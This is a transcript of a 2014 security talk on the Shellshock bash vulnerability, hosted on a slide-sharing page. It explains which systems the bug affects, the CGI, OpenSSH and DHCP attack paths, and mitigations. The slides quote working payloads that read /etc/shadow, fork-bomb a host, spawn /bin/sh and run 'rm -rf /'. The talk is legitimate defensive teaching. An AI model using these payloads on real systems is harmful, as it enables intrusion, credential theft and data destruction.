Upgrade to Pro — share decks privately, control downloads, hide ads and more …

ShellShock

Avatar for Julien Savoie Julien Savoie
September 29, 2014

 ShellShock

The talk I gave at HASK in 2014 on the vulnerability in bash known as shellshock.

Avatar for Julien Savoie

Julien Savoie

September 29, 2014
Tweet

More Decks by Julien Savoie

Other Decks in Technology

Transcript

  1. • Who does it impact? Bash 1.13 to 4.3. If

    you installed bash from between 1992 to now. • Where is bash used?
  2. What's the attack? Define a function within an environment variable,

    whatever you place after will be executed. foo () { ignored; }; my attack code goes here. env bar='() { :; }; echo vulnerable' bash -c 'echo hello world' Output; vulnerable hello world
  3. Common Gateway to Hell • Any calls to cgi (common

    gateway interface) services pass http client header variables as environment variables. Such as "user-agent”, or “referer”. • User-agent switcher for Chrome; () { :; }; (){ :|: & };: • Nameless major vendor; () { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/shadow
  4. People are already mass scanning 209.126.230.72 - - [24/Sep/2014:23:53:34 -0300]

    "GET / HTTP/1.0" 200 12761 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/ 2014/09/bash-shellshock-scan-of-internet.html)“
  5. OpenSSH isn't safe • From sshd_config: # Allow client to

    pass locale environment variables AcceptEnv LANG LC_* • This means ForceCommand can be escaped $ env LC_NINJA='() { :; }; /bin/sh' ssh victimhost • SSH_ORIGINAL_COMMAND is set anyways $ ssh victimhost '() { :; }; /bin/sh' • You use "internal-sftp" right? • Why do we care about ForceCommand?
  6. DHCP • dhcpcd/dhclient makes system() calls • Rogue DHCP servers

    can execute arbitrary commands on hosts (usually as uid=0) /etc/dhcp/dhcpd.conf: option default-url "() { :; }; rm -rf /"; • Consider using "ip dhcp snooping vlan 100,110,115,...”
  7. Et tu, Mac OS X? • Bash 3.2.51 is installed

    at /bin/sh • Can be leveraged to get root, suid anyone? • Apple dhcp client does not use system() calls
  8. What should we have learned? • Widely deployed OSS software

    should be audited, especially if old • Often they are, but not by nice people • Data received from untrusted sources should be sanitized, before used • Switch default shell? /bin/sh -> dash or tcsh • Disable function importing by default?